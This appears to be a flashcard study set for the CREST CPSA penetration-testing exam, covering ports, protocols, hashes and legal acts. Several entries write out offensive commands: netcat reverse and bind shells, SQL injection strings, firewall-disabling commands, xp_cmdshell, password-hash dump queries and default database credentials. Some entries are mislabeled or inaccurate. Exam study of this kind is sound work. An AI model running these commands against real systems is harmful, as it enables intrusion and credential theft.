CREST CPSA EXAM 3000 QUESTIONS AND CORRECT ANSWERS LATEST 2023-2024(VERIFIED ANSWERS)

TCP
Transmission Control Protocol

UDP
User Datagram Protocol

Port 21
FTP

FTP
File Transfer Protocol

Port 22
SSH

SSH
Secure Shell

Port 23
Telnet

Port 25
SMTP

SMTP
Simple Mail Transfer Protocol

Port 49
TACACS

TACACS
Terminal Access Controller Access Control System

Port 53
DNS

DNS
Domain Name System

Port 67 (UDP)
DHCP (Server)

Port 68 (UDP)
DHCP (Client)

DHCP
Dynamic Host Configuration Protocol

Port 69 (UDP)
TFTP

TFTP
Trivial File Transfer Protocol

Port 80
HTTP

HTTP
Hypertext Transfer Protocol

Port 88
Kerberos

Kerberos
A computer network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner

Port 110
POP3

POP3
Post Office Protocol version 3

Port 111
RPC

RPC
Remote Procedure Call

Port 123
NTP

NTP
Network Time Protocol

Port 135
Windows RPC (EPM)

Port 593
RPC over HTTPS

Port 445
SMB

SMB
Server Message Block

Port 137 (UDP)
NetBIOS (name services)

Port 138 (UDP)
NetBIOS (datagram services)

Port 139
NetBIOS (session services)

NetBIOS
Network Basic Input/Output System

Port 143
IMAP

IMAP
Internet Message Access Protocol

Port 161 (UDP)
SNMP

SNMP
Simple Network Management Protocol

Port 179
BGP

BGP
Border Gateway Protocol

Border Gateway Protocol (BGP)
A standardized exterior gateway protocol designed to exchange routing and reachability information among autonomous systems on the Internet. The protocol is classified as a path vector protocol.

Port 201
AppleTalk

Port 389
LDAP

LDAP
Lightweight Directory Access Protocol

Port 443
HTTPS

Port 500 (UDP)
Internet Key Exchange (IKE) (used with IPSec) / ISAKMP

ISAKMP
Internet Security Association and Key Management Protocol

Port 514 (UDP)
Syslog

Port 520
RIP

RIP
Routing Information Protocol

Port 546
DHCPv6 (client)

Port 567
DHCPv6 (servers)

Port 587
SMTP

Port 902
VMWare

Port 1080
Socks Proxy

Port 636
LDAPS

Port 1194
VPN

Port 1433
MS-SQL

Port 1434
MS-SQL (monitoring)

Port 1521
Oracle

Port 1629
DameWare

Port 2049
NFS

NFS
Network File System

Port 3128
Squid Proxy

Port 3306
MySQL

Port 3389
RDP (Remote Desktop Protocol)

Port 5060
SIP

SIP
Session Initiation Protocol

Port 5222
Jabber

Port 5432
Postgres

Port 5666
Nagios

Postgres
An object-relational database management system with an emphasis on extensibility and standards compliance

Nagios
Open source system monitoring service

Port 5900
VNC

VNC
Virtual Network Computing

Port 6000
X11

X11
A windowing system for bitmap displays, common on Unix-like operating systems. Provides the basic framework for a GUI environment: drawing and moving windows on the display device and interacting with a mouse and keyboard.

Port 6129
DameWare

DameWare
Remote Access Software on port 6129

Port 6667
IRC (Internet Relay Chat)

Port 9001
Tor

Port 9001
HSQL

Port 9090
Openfire

Port 9100
Jet Direct

Yersinia
Layer 2 testing tool (STP, CDP, VLAN Trunking, etc)

STP
Spanning Tree Protocol

CDP
Cisco Discovery Protocol

DTP
Dynamic Trunking Protocol

HSRP
Hot Standby Router Protocol

VTP
VLAN Trunking Protocol

fgdump
A utility for dumping passwords on Windows NT/2000/XP/2003 machines

Reserved Internal IPs
10.0.0.0/8 (10.0.0.0-10.255.255.255) : Private

127.0.0.0/8 (127.0.0.0-127.255.255.255) : Local Host Loopback

172.16.0.0/12 (172.16.0.0-172.31.255.255) : Private

192.168.0.0/16 (192.168.0.0-192.168.255.255) : Private

Symmetric Encryption
DES/3DES
AES
Twofish
Blowfish
Serpent
IDEA
RC4, RC5, RC6
CAST

Asymmetric Encryption
RSA
El Gamal
ECC (Elliptic Curve)
Diffie-Hellman (Key Exchange)
Paillier
Merkle-Hellman
Cramer-Shoup

Hashes
MD5
SHA1
MySQL < 4.1
MySQL5
MD5 (WP)
MD5 (phpBB3)
LM / NTLM

Oracle Default Credentials
Username | Password
SYSTEM | MANAGER
ANONYMOUS | ANONYMOUS
SCOTT | TIGER
OLAPSYS | MANAGER
SYS | CHANGE_ON_INSTALL

Port 512
rexec (username / password)

Port 513
rlogin (telnet)

Port 514
rsh

Port 514
rcp

LM Hash
Primary Windows LAN hash before Windows NT. 14 character limit.

DES
56 bit key encryption (16 cycles of 48 bit subkeys)

3DES
168 bit key encryption (48 cycles)

TTL for Windows
128

TTL for Linux
64

TTL for Networking Devices / Solaris
255

Cisco Password Encryption
secret 4 : Crappy SHA256
secret 5 : Salted MD5
secret 7: Crappy Cisco encryption to prevent cleartext in the config
secret 8 : PBKDF2 (Password-Based Key Derivation Function 2) bruteforce target
secret 9 : scrypt (BINGO)

SIP Requests
INVITE
ACK
BYE
CANCEL
OPTIONS
REGISTER
PRACK
SUBSCRIBE
NOTIFY
PUBLISH
INFO
REFER
MESSAGE
UPDATE

SMTP Requests
MAIL
RCPT
DATA

SNMP Requests
Get
GetNext
Set
GetBulk
Response
Trap
Inform

HTTP Status Codes
1xx – Info
2xx – Success
3xx – Redirection
4xx – Error
5xx – Server Error

HTTP Status Code 404
NOT FOUND the method is not available

HTTP Status Code 301
Moved Permanently

HTTP Status Code 302
Temporarily Moved

HTTP Status Code 410
Gone

SQL Injections (Escape Characters)
' OR '1' = '1' --
' OR '1' = '1' {
' OR '1' = '1' /*

SQL Injections (Type Handling)
1; DROP TABLE users

Linux File Permissions
drwxrwxrwx 2 user(owner) group size date filename

d | rwx | rwx | rwx
Filetype | User | Group | Everyone

Linux Command : Change Password
passwd

Linux Command : Find Files of Type
find . -type f -iname '*.pdf'
locate '*.pdf'

Linux File System Structure
/bin – User Binaries
/boot – Bootup related files
/dev – Interface for system devices
/etc – System Config Files
/home – Base directory for user files
/lib – Critical software libraries
/opt – Third party software
/proc – System and running processes
/root – Home for root
/sbin – Sys Admin binaries
/tmp – Temporary Files
/usr – Less critical files
/var – Variable system files

IPTables
A user-space utility program that allows a system administrator to configure the tables provided by the Linux kernel firewall and the chains and rules it stores

Wireshark and TCPdump
Common packet analyzers. Allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached

pfSense
Open source firewall/router computer software distribution based on FreeBSD

Solaris Command : Process Listing
prstat -a

Solaris Command : Services and Status
svcs -a

Solaris Command: Start Service (Admin)
svcadm start

NT 3.1 Versions
Windows NT 3.1 (All)

NT 3.5 Versions
Windows NT 3.5 (All)

NT 3.51 Versions
Windows NT 3.51 (All)

NT 4.0 Versions
Windows NT 4.0 (All)

NT 5.0 Versions
Windows 2000 (All)

NT 5.1 Versions
Windows XP (Home, pro, MC, Tablet, PC, Starter, Embedded)

NT 5.2 Versions
Windows XP (64 bit, Pro 64 bit)
Windows Server 2003 and R2
Windows Home Server

NT 6.0 Versions
Windows Vista (All)
Windows Server 2008 (Foundation, Standard, Enterprise)

NT 6.1 Versions
Windows 7 (All)
Windows Server 2008 R2 (All)

NT 6.2 Versions
Windows 8
Windows Phone 8
Windows Server 2012

%SYSTEMDRIVE%\boot.ini
Contains the boot options for computers with BIOS firmware running an NT-based operating system prior to Windows Vista

%SYSTEMROOT%\repair\SAM

%SYSTEMROOT%\System32\config\RegBack\SAM
Stores Windows users’ passwords in a hashed format (in LM hash and NTLM hash). These are backups of C:\windows\system32\config\SAM

Windows Commands : System Info
ver : OS Version
sc query state=all : Services
tasklist /svc : Processes and Services
echo %USERNAME% : Current user

Windows Command : Find Files of Type
dir /a /s /n c:\*.pdf

Windows Commands : Add User, Make Admin
net user <username> <password> /add
net localgroup "Administrators" <username> /add

Linux Command : Add User, Make Sudoer
useradd <username> (or adduser <username>)
passwd <username>
usermod -aG sudo <username> (or adduser <username> sudo)

Command : View Network Info
Linux: ifconfig
Windows: ipconfig /all

Command : Display File Contents
Linux: cat
Windows: type (cat is an alias in PowerShell)

nslookup
A network administration command-line tool for querying the Domain Name System (DNS) to obtain domain name or IP address mapping or for any other specific DNS record.

IIS 1 Defaults
Windows NT Addon

IIS 2 Defaults
NT 4.0

IIS 3 Defaults
NT 4 Service Pack

IIS 4 Defaults
NT4 Option Pack

IIS 5 Defaults
Windows 2000

IIS 5.1 Defaults
Windows XP

IIS 6 Defaults
Windows Server 2003, Windows XP Pro

IIS 7 Defaults
Windows Vista, Server 2008

IIS 7.5 Defaults
Windows 7, 2008 R2

IIS 8 Defaults
Windows Server 2012, Windows 8

IIS 8.5 Defaults
Windows Server 2012 R2, Windows 8.1

IIS 10 v 1607 Defaults
Windows Server 2016, Windows 10 Anniversary Update

IIS 10 v 1709 Defaults
Windows 10 Fall Creators, v1709

IIS 10 v 1809 Defaults
Windows Server 2019, Windows 10 October Update

Windows Command : Disable Firewall
netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off

Sysinternals Suite
A set of powerful Windows administration applications used to view, troubleshoot, and modify Windows functions

WMIC
Windows Management Instrumentation Command-line

WMIC Command : Execute Process
wmic process call create "process_name"

WMIC Command : Uninstall Software
wmic product get name /value
wmic product where name="XX" call uninstall /nointeractive

PCI Card Info Storage Common-Use

  • Store card details (i.e. CC number, expiry) in encrypted form
  • Store cardholder details (name, address, contact details, i.e. PII) in a SEPARATE encrypted database with a unique reference identifier linking the two
    -DO NOT STORE sensitive data (i.e. CVV2, CVV or CID values)

Windows : Active Directory Default Location
C:\Windows\NTDS

Ntds.dit is the physical storage file

Windows : Domain Common Folders
C:\Windows\SYSVOL

Contains Group Policies, Login Scripts, Staging Folders, etc.

dsquery
Remote Server Administration Tools (RSAT) feature pack tool used to enumerate Windows Domain

Classful IP Range : Class A
128 Networks (2^7), 16,777,216 Addresses per network (2^24)

Range : 0.0.0.0-127.0.0.0
Default Subnet Mask : 255.0.0.0
CIDR Notation : /8

Classful IP Range : Class B
16,384 Networks (2^14), 65,536 Addresses per network (2^16)

Range : 128.0.0.0-191.255.0.0
Default Subnet Mask : 255.255.0.0
CIDR Notation : /16

Classful IP Range : Class C
2,097,152 Networks (2^21), 256 Addresses per network (2^8)

Range : 192.0.0.0-223.255.255.0
Default Subnet Mask : 255.255.255.0
CIDR Notation : /24

Classful IP Range Calculation
If the first bit is a “0”, it’s a class A address (Half the address space has a “0” for the first bit, so this is why class A takes up half the address space.)

If the second bit is a “0”, it’s a class B address (Half of the remaining non-class-A addresses, or one quarter of the total.)

If the third bit is a “0”, it’s a class C address (Half again of what’s left, or one eighth of the total.)

If the fourth bit is a “0”, it’s a class D address. (Half the remainder, or one sixteenth of the address space.) If it’s a “1”, it’s a class E address. (The other half, one sixteenth.)

Classless Subnets / CIDR
Class C – 255.255.255.0 , /24 (254 Hosts)
Class B – 255.255.0.0 , /16 (65,534 Hosts)
Class A – 255.0.0.0 , /8 (16,777,214 Hosts)

CRITICAL SUBNET INFO
RTFM page 36

Hexadecimal Chart
0
1
2
3
4
5
6
7
8
9
10 – A
11 – B
12 – C
13 – D
14 – E
15 – F

VLAN
A switched network that is logically segmented by function, project team, or application, without regard to the physical locations of the users.

VLAN IDs 1002-1005
Token Ring and FDDI VLANs

VLAN IDs greater than 1005
Extended-range VLANs (not stored in the VLAN database)

VLAN IDs 1-1005
Normal-range VLANs

vlan.dat
Configurations for VLAN IDs 1-1005

Netcat : Start Listener to Catch Shell
Linux:
nc 10.0.0.1 1234 -e /bin/sh
Windows:
nc 10.0.0.1 1234 -e cmd.exe

(-e is execute and is not always supported)

Netcat : Listen
nc -nlvp

Netcat : Transfer Text or Binary Files
Listener : nc -nlvp 4444 > incoming.exe

Sender: nc -nv <IP to send to> 4444 < file

Netcat : Bind Shell
Listener:
nc -nlvp 4444 -e cmd.exe (to set up cmd to run)

Sender/ “Talker”:
nc -nv <IP to connect to> 4444

(this will execute cmd.exe and allow the "Talker" to connect to the host)
Attacking Listener

Netcat : Reverse Shell
Listener:
nc -nlvp 4444

Sender:
nc -nv <IP to send to> 4444 -e /bin/bash

(sends shell!)
Attacking Sender

NMap : Scan Types
-sP : ping scan
-sS : syn scan (“half open” scan)
-sT : connect scan (full TCP)
-sU : UDP scan
-sO : protocol scan

Port Count
65,536 (2^16) Ports

This applies to TCP AND UDP

NMap : Scan EVERY Port
TCP: nmap -p-
UDP: nmap -sU -p-

NMap : Common Options
-p1-65535 : Ports
-T[0-5] : “Scan Speed”, can help hide you
-n : No DNS Resolution
-O : OS Detection
-A : AGGRESSIVE
-sV : Version Detection
-PN : No Ping
-6 : IPv6 Scan
-oA : Output ALL types

NMap : DNS Reverse Lookup
nmap -R -sL --dns-servers <server>

Hash Lengths
MD5 : 16 Bytes
SHA-1 : 20 bytes
SHA-256 : 32 Bytes
SHA-512 : 64 Bytes

IIS
Microsoft Web Server

Apache / Tomcat
Apache Web Servers

GWS
Google Web Server

Websphere
IBM Web Server

Litespeed
LiteSpeed Tech Web Server

MS-SQL : DB Version
SELECT @@version

EXEC xp_msver
(detailed version info)

MS-SQL : Run OS Command
EXEC master..xp_cmdshell 'net user'

MS-SQL : SELECT commands
SELECT HOST_NAME( ) : Hostname and IP

SELECT DB_NAME ( ) : Current DB

SELECT name FROM master..sysdatabases; : List DBs

SELECT user_name ( ) : Current user

SELECT name FROM master..syslogins : List users

SELECT name FROM master..sysobjects WHERE xtype='U'; : List Tables

SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='mytable'); : List columns

MS-SQL : List all Tables and Columns
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable')

MS-SQL : System Table (Info on All Tables)
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

MS-SQL 2005 Vulnerability (Password Hashes)
SELECT name, password_hash FROM master.sys.sql_logins

Postgres : SELECT commands
SELECT version(); : DB Version

SELECT inet_server_addr(); : Hostname and IP

SELECT current_database(); : Current DB

SELECT datname FROM pg_database; : List DBs

SELECT user; : Current user

SELECT usename FROM pg_user; : List Users

SELECT usename, passwd FROM pg_shadow; : List password hashes

MySQL Default Credentials
root | MYSQL

MySQL : SELECT Commands
SELECT @@version; : DB Version

SELECT @@hostname; : Hostname and IP

SELECT database(); : Current DB

SELECT distinct (db) FROM mysql.db; : List DBs

SELECT user(); : Current user

SELECT user FROM mysql.user; : List Users

SELECT host,user,password FROM mysql.user; : List password hashes

MySQL : List Tables (and Columns)
SHOW TABLES (only works for current database)

SELECT * FROM information_schema.columns (full dump)

Oracle : SELECT Commands
SELECT * FROM v$version; : DB Version
(SELECT version FROM v$instance;)

SELECT instance_name FROM v$instance : Current DB
(SELECT name FROM v$database;)

SELECT DISTINCT owner FROM all_tables; : List DBs

SELECT user FROM dual; : Current User

SELECT username FROM all_users ORDER BY username; : List users

SELECT column_name FROM all_tab_columns; : List Columns

SELECT table_name FROM all_tables; : List Tables

SELECT name, password, astatus FROM sys.user$; : List password hashes

hosts.equiv (or .rhosts file) Structure
Allow any user to log in from any host:

+

Allow any user from host with a matching local account to log in:

host

Allow any user from host to log in:

host +

Allow user from host to log in as any non-root user:

host user

Allow all users with matching local accounts from host to log in except for baduser:

host -baduser
host

Deny all users from host:

-host

Allow all users with matching local accounts on all hosts in a netgroup:

+@netgroup

Disallow all users on all hosts in a netgroup:

-@netgroup

Allow all users in a netgroup to log in from host as any non-root user:

host +@netgroup

Allow all users with matching local accounts on all hosts in a netgroup except baduser:

+@netgroup -baduser
+@netgroup

Linux Shell Breakouts
python -c 'import pty;pty.spawn("/bin/bash")'

echo os.system('/bin/bash')

/bin/sh -i

Language Vulns : Java (OO)
Log Injection
Deadlock
Language-based Attacks

Language Vulns : C (Function)
Code Injection
Buffer Overflow

Language Vulns : Objective-C (OO)
Code Insertion
Malformation
Race Conditions

Language Vulns : C++ (OO)
Race Conditions

Language Vulns: PHP
Incorrect Element Removal

NIC
Network Interface Card

Network Interface Card (NIC)
An expansion card that enables a computer to connect other computers or to a cable modem to facilitate a high-speed Internet connection.

MAC
Media Access Control

NAT
Network Address Translation

Media Access Control (MAC)
An address for communications on the physical network segment.

Network Address Translation (NAT)
A technique that allows private IP addresses to be used on the public Internet.

OSI Model
“Please Dont Nag Tyrannosaurus, She’ll Probably Attack”

1 : Physical (Bits)
2 : Data Link (Frames)
3 : Network (Packets)
4 : Transport (Segments)
5 : Session (Data)
6 : Presentation (Data)
7 : Application (Data)

TCP/IP Model
“Never Ingest Turian Almonds”

1 : Network Interface
2 : Internet Layer
3 : Transport Layer
4 : Application Layer

IETF
Internet Engineering Task Force

IANA
Internet Assigned Numbers Authority

Wireless Standards
802.11b – 2.4 GHz 11 Mbps
802.11a – 5 GHz, 54 Mbps
802.11g – 2.4 GHz, 54 Mbps
802.11n – 5 GHz, 108 Mbps
802.15 – Bluetooth 2.4 GHz

Data Link Protocols
1) SLIP (serial line internet protocol)
2) PPP (point-to-point protocol)
3) ARP (address resolution protocol) (resolves IPs into MACs)
4) RARP (reverse address resolution protocol) (MACs into IPs)
5) L2F (layer 2 forwarding)
6) L2TP (layer 2 tunneling protocol)
7) PPTP (point-to-point tunneling protocol)
8) ISDN (integrated services digital network)

ARP
Address Resolution Protocol

IGMP
Internet Group Management Protocol

FQDN
Fully Qualified Domain Name

IOC
Indications of Compromise

POC
Point of Contact

Proof of Concept

SIEM
Security Information and Event Management

MBSA
Microsoft Baseline Security Analyzer

CAT5
type of cable that has the ability to transfer information from one computer to another

Ethernet
a system for connecting a number of computer systems to form a local area network, with protocols to control the passing of information and to avoid simultaneous transmission by two or more systems.

Token Ring
A networking technology developed by IBM in the 1980s. It relies upon direct links between nodes and a ring topology, using tokens to allow nodes to transmit data.

APIPA
Automatic Private Internet Protocol Addressing

MTU
maximum transmission unit – The largest data unit a network (for example, Ethernet or token ring) will accept for transmission.

Unicast
a message that is sent from a single sender to a single recipient

Multicast
a form of transmission in which a message is delivered to a group of hosts

Router Protocol
a protocol used between routers so that they can learn routes to add to their routing tables.

Link State Routing
A routing method that floods routing information to all routers within a network to build and maintain a more complex network route database.

Distance Vector Routing
Each router passes a copy of its routing table to its adjacent neighbors. The neighbor adds the route to its own table, incrementing the metric to reflect the extra distance to the end network. The distance is given as a hop count; the vector component specifies the address of the next hop.

Hybrid Routing
Routing protocol that uses the attributes of both distance vector and link state

IGP
Interior Gateway Protocol

Interior Gateway Protocol (IGP)
A routing protocol that operates within an autonomous system, which is a network under a single administrative control. Includes IGRP, EGRP, RIP, OSPF, and EIGRP

EGP
Exterior Gateway Protocol

Exterior Gateway Protocol (EGP)
A routing protocol that operates between autonomous systems, which are networks under different administrative control. Border Gateway Protocol (BGP) is the only one in widespread use today.

IPv6
A new protocol developed to replace IPv4, addressing the issue of IP address exhaustion.

No broadcast, has Anycast instead.
128-bit, written in hexadecimal

MAC Address
A Media Access Control address is a hardware address that uniquely identifies each node on a network.

Traditional MAC addresses are 12-digit (6 bytes, or 48 bits) hexadecimal numbers.

Network Architectures
The design of a computer network; includes both physical and logical design.

10BaseT
LAN (Ethernet)
10 Mbps

100BaseT
“Fast Ethernet”
100 Mbps

1000BaseT
Gigabit Ethernet
1 Gbps

Wireless Network
Any type of computer network that is not connected by cables of any kind.

802.11

Shared Media LAN
LAN that shares total bandwidth with all stations (ex. Token Ring)

Switched Media LAN
LAN with bandwidth shared between sender and receiver (Predicated Paths)

*Hubs are similar, but with NODES

Netcraft
Company that tracks web statistics, used to fingerprint web servers

WHOIS
a public Internet database that contains information about Internet domain names and the people or organizations that registered the domains. It is a source of information that can be used to exploit system vulnerabilities.

Egress filtering
Filtering outbound traffic

Ingress Filtering
Filtering inbound traffic

DNS Record Types
SOA- Start of Auth Record
MX- Mail Exchange
TXT- Text Record
A- Address (IPv4)
AAAA- Address (IPv6)
NS – Name Server
PTR – Pointer Record
HINFO – Description of computer / OS
CNAME – Canonical Name

Start of Authority (SOA) Record
Every zone file must include a _ record to identify the name server that’s primarily responsible for the database segments it manages.

Mail Exchanger (MX) Record
A record used by e-mail servers for determining the host names of servers responsible for handling a domain’s incoming e-mail.

A / AAAA Record
IP Address

Name Server (NS) Record
announces the authoritative name servers for a particular zone who will answer queries for their supported zone

Pointer Record (PTR)
A record that points IP addresses/Canonical to host names. See also Reverse Lookup Zone.

CNAME (Canonical name record)
A type of DNS data record that holds alternative names for a host.

Network Protocols
ARP
DHCP
CDP
HSRP
VRRP
VTP
STP
TACACS

Cisco Discovery Protocol (CDP)
a Cisco proprietary Layer 2 protocol to gather information about neighboring Cisco devices

HSRP (Hot Standby Router Protocol)
This is exclusive to Cisco and allows a default router address to be configured to be used in the event that the primary router fails.

VRRP (Virtual Router Redundancy Protocol)
A standard that assigns a virtual IP address to a group of routers. At first, messages routed to the virtual IP address are handled by the master router. If the master router fails, backup routers stand in line to take over responsibility for the virtual IP address.

VTP (VLAN Trunking Protocol)
Cisco’s protocol for exchanging VLAN information over trunks. Allows one switch on a network to centrally manage all VLANs.

STP (Spanning Tree Protocol)
A Layer 2 protocol that is used for routing and prevents network loops by adopting a dynamic routing method.

WEP
Wired Equivalent Privacy

Wired Equivalent Privacy (WEP)
An IEEE 802.11 security protocol designed to ensure that only authorized parties can view transmitted wireless information. Has significant vulnerabilities and is not considered secure.

WPA
Wireless Protected Access

Wireless Protected Access (WPA)
The 802.11 security method created as a stopgap between WEP and 802.11i.

WPA2 uses AES Encryption

EAP (Extensible Authentication Protocol)
A protocol that enables systems to use hardware-based identifiers, such as fingerprint scanners or smart card readers, for authentication.

EAP
Extensible Authentication Protocol

LEAP
Lightweight Extensible Authentication Protocol

PEAP
Protected Extensible Authentication Protocol

nbtstat
A Windows utility that is used to view and manage NetBIOS name cache information.

Global Catalog Server
A domain controller that holds a subset of the information in all domain partitions for the entire Active Directory forest.

Master Browser
Present on every subnet. Needed for a routed TCP/IP network

FSMO
Flexible Single Master Operations

Flexible Single Master Operations (FSMO) Roles
Also known as operations master roles, these are servers that provide certain functions that can only be handled by one domain controller at a time.

LANMAN hash
The original hash used to store Windows passwords, known as LM hash, based off the DES algorithm. (Legacy)

NTLM
New Technology LAN Manager

NTLM Hash
Successor to the LM hash. A more advanced hash used to store Windows passwords, based off the RC4 algorithm.

NTLMv2
NTLMv2 was developed in response to attacks against the LM authentication protocol. The LM protocol, as the name implies, was originally used in the old LAN Manager Network operating system in the mid-1980s. It uses the MD5 password hash algorithm.

OSPF (Open Shortest Path First)
A link-state routing protocol used on IP networks.

Static Routing
A type of routing used by a network administrator to manually specify the mappings in the routing table.

Dynamic Routing
Allows a router to determine the best route between two nodes automatically and then store this information in a routing table.

Port 1
TCP Port Service Multiplexer (TCPMUX)

Port 5
Remote Job Entry (RJE)

Port 7
ECHO or ICMP

Port 18
Message Send Protocol (MSP)

Port 29
MSG ICP

Port 37
time

Port 42
Host Name Server (Nameserv)

Port 43
WHOIS

Port 70
Gopher Services

Port 79
finger

Port 103
X.400 Standard

Port 118
SQL Services

Port 119
NNTP (Network News Transfer Protocol)

Newsgroup

Port 159
SQL Server

Port 190
Gateway Access Control Protocol (GACP)

Port 197
Directory Location Service (DLS)

Port 396
Novell Netware over IP

Port 444
Simple Network Paging Protocol (SNPP)

Port 458
Apple QuickTime

Port 500
IKE Internet Key exchange (TCP/UDP)

Computer Misuse Act 1990
An Act which makes illegal a number of activities such as deliberately planting viruses, hacking, using ICT equipment for fraud.

Human Rights Act 1998
Act of Parliament that incorporated the European Convention on Human Rights into UK law, making it enforceable in UK courts

Data Protection Act 1998
The UK law that tells organisations how they must protect the personal data of real people. (NOW GDPR)

GDPR (General Data Protection Regulation)
New European Union law on data protection and privacy for individuals.

DoS
Denial of Service

DDoS (Distributed Denial of Service)
An attack on a computer or network device in which multiple computers send data and requests to the device in an attempt to overwhelm it so that it cannot perform normal operations.

XSS (Cross Site Scripting)
A type of application attack where the attacker takes advantage of scripting and input validation vulnerabilities in an interactive website to attack legitimate users.

MySQL < 5.1 Authentication Bypass
Bug that allows authentication even when password provided is incorrect.

1/256 chance of being triggered, so one can just keep sending login attempts over and over to access.

*Can only be exploited if built on a system where the memcmp() function can return values outside the -128 to 127 range

Passive OS fingerprinting
Observing host behavior and packets (DHCP, TCP, etc) to determine OS

Common Tools: Network Miner, p0f, Satori, Wireshark

Active OS Fingerprinting
Sends specially crafted packets to the remote OS and analyzes the received response.

NMap is awesome at this

AES (Advanced Encryption Standard)
A block cipher created in the late 1990s that uses a 128-bit block size and a 128-, 192-, or 256-bit key size.

TKIP (Temporal Key Integrity Protocol)
A security protocol created by the IEEE 802.11i task group to replace WEP.

SMTP User Enumeration
EXPN
VRFY

Sendmail < 8.12.9 Buffer Overflow
The prescan function in Sendmail 8.12.9 allows remote attackers to execute arbitrary code via buffer overflow attacks, as demonstrated using the parseaddr function in parseaddr.c.

X11
Runs on TCP Port 6000
(can range between 6000-6063)

Can be intercepted if not tunneled through SSH

RPC (Remote Procedure Call) Enumeration
Can be assessed using portmapper requests

Query RPC portmapper using rpcinfo: rpcinfo -p

Non-Persistent XSS
XSS that occurs when the attacker’s script that is injected is not stored in the backend, and the Web-browser client simply echoes back the results of the script execution. It can be over GET (QueryString) or POST (Forms) methods.

Can be used to steal cookies, redirect to phishing sites, and force actions if targets click on crafted links

Persistent XSS
malicious code that remains on a website (for ex) until it is removed

Good for getting ahold of forms, tickets, submissions, etc

SOAP
Simple Object Access Protocol

Simple Object Access Protocol (SOAP)
An XML-based communication protocol used for sending messages between applications via the Internet.

XML injection
An attack that injects XML tags and data into a database. Can change data, affect how data is processed, etc.

XXE (XML External Entity) Attack
This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts

Web Server Common Flaws
Denial of Service (DoS)
Buffer overflow attacks
Attacks on vulnerable scripts
URL manipulation

HTTP Web Methods
*Risky Methods are marked with a star

GET
HEAD (similar to GET)
POST
PUT*
DELETE*
CONNECT*
OPTIONS
TRACE*
PATCH

LDAP Injection
An attack that allows for the construction of LDAP statements based on user input statements, which can then be used to access the LDAP database or modify the database’s information

Base64 Encoding
An encoding scheme which represents any binary data using only printable ASCII characters. Usually used for encoding email attachments over SMTP

OSSTMM
Open Source Security Testing Methodology Manual

ISECOM
Institute for Security and Open Methodologies

OWASP
Open Web Application Security Project

PTES
Pen Testing Execution Standard

CPNI
Centre for the Protection of National Infrastructure (UK best practices)

Police and Justice Act 2006
Defines police limitations of searching tech

Computer Fraud and Abuse Act of 1986
This act defines cybercrime as any illegal act for which knowledge of computer technology is essential for its perpetration, investigation, or prosecution; currently being evaluated for revision because much of its language was developed before the Internet boom

HIPAA
Health Insurance Portability and Accountability Act

FISMA
Federal Information Security Management Act

GLBA
Gramm-Leach-Bliley Act

Gramm-Leach-Bliley Act of 1999
requires financial institutions to ensure the security and confidentiality of customer data

GDPR
General Data Protection Regulation

FERPA
Family Educational Rights and Privacy Act

PCI DSS
Payment Card Industry Data Security Standard

Basel Accord
an agreement that required that banks hold as capital at least 8% of their risk-weighted assets

ISO 27000 Series
this series contains a range of individual standards and documents specifically reserved by ISO for information security

COBIT
Control Objectives for Information and Related Technology

IPv4
The Internet Protocol version 4 is the dominant protocol for routing traffic on the Internet, specifying “to” and “from” addresses using a dotted decimal such as “122.45.255.0”.

Cat 5
Category 5 wire, a TIA/EIA standard for UTP wiring that can operate at up to 100 Mbps.

TTL
Time to Live

CSMA/CA
Carrier Sense Multiple Access with Collision Avoidance

CDMA
Code Division Multiple Access (GSM competitor)

The ATM PDU is the cell
OSI physical layer PDU is the bit
OSI data link layer PDU is the frame
OSI network layer PDU is the packet
OSI transport layer PDU is the segment
PDUs between OSI session and application layers are referred to simply as the data
OSI Model PDU

1.3.6.1.2.1.25.1.6.0
System Processes
1.3.6.1.2.1.25.4.2.1.2
Running Programs
1.3.6.1.2.1.25.4.2.1.4
Processes Path
1.3.6.1.2.1.25.2.3.1.4
Storage Units
1.3.6.1.2.1.25.6.3.1.2
Software Name
1.3.6.1.2.1.77.1.2.25
User Accounts
1.3.6.1.2.1.6.13.1.3
TCP Local Ports
Microsoft SNMP

TCP Port 1
Multiplexer tcpmux

TCP Port 7
Echo

TCP Port 11
System status (systat, active users)

TCP 13
Date and time.

TCP 15
netstat

TCP 19
chargen

TCP 21
ftp

TCP 22
ssh

TCP 23
Telnet

TCP 25
smtp

TCP 37
Time

TCP 42
wins

TCP 43
whois

TCP 49
tacacs

TCP 53
DNS

TCP 70
gopher

TCP 79
finger

TCP 80
http

TCP 88
Kerberos

TCP 110
pop3

TCP 113
auth

TCP 119
nntp

TCP 139
Netbios

TCP 143
imap

TCP 179
bgp

TCP 389
LDAP

TCP 443
https

TCP 445
SMB (cifs)

TCP 512
exec (remote)

TCP 513
login (remote )

TCP 514
shell (remote)

TCP 1080
socks proxy

TCP 1433
ms-sql

TCP 1521
TNS Oracle

TCP 1723
pptp

TCP 2433
ms-sql (hidden)

TCP 3128
squid proxy

TCP 3268
Active Directory Global Catalog (LDAP)

TCP 3306
mysql

TCP 3389
RDP

TCP 5432
postgres

TCP 5900
vnc

TCP 6000
X11

TCP 9100
Jetdirect

UDP 53
DNS

UDP 67 and 68
DHCP

UDP 69
tftp

UDP 123
ntp

UDP 135
RPC

UDP 137 and 138
Netbios

UDP 161
snmp

UDP 445
SMB

UDP 500
IKE

UDP 513
rwho

UDP 520
RIP

UDP 1434
ms-sql monitor (SQL Server Resolution Service, also known as the SQL Browser)

UDP 2049
nfs

TKIP
Temporal Key Integrity Protocol

XML
Extensible Markup Language

LSASS
Local Security Authority Subsystem Service

LSA
Local Security Authority

RSA
Rivest, Shamir, & Adleman

CRLF
carriage-return/line-feed

OSPF
Open Shortest Path First

NFS
Network File System

RIP
Routing Information Protocol

IKE
Internet Key Exchange

AES
Advanced Encryption Standard

SQL
Structured Query Language

ISAPI
Internet Server Application Programming Interface

ASP
Active Server Pages

NTP
Network Time Protocol

WSUS
Windows Server Update Services

SSH
Secure Shell

WSDL
Web Services Description Language

CNAME
